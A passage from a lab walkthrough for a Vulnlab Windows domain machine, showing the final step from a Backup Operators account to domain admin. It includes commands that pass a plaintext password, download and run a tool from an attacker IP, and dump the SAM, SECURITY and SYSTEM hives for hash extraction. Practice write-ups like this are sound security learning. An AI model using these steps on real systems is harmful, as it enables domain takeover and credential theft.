PS C:\temp> .\BackupOperatorToDA.exe -t \\lusdc.lustrous.vl -u tony.ward -p U_cPVQqEI50i1X -d lustrous.vl -o \\10.8.4.253\share\

Way3:

In our RDP session, we want a shell as tony.ward, so we simple right click on powershell -> run as a different user -> and enter the credentials from tony.

Then we can use RemoteRegSave to extract the SAM, SECURITY and SYSTEM keys.

Just need to download it then compile with Visual studio then upload it to the target and execute it:

PS C:\temp> iwr http://10.8.4.253/RegSave.exe -outfile RegSave.exe
PS C:\temp> .\RegSave.exe -t LusDC.lustrous.vl --acl

Then we can download these 3 files to our attacker machine and dump the hashes with the same manner than Way1.

Extra

Challenge solved! Use this link to share it: https://api.vulnlab.com/api/v1/share?id=c88f354d-84b8-4849-82d3-ee06eaa8146d

image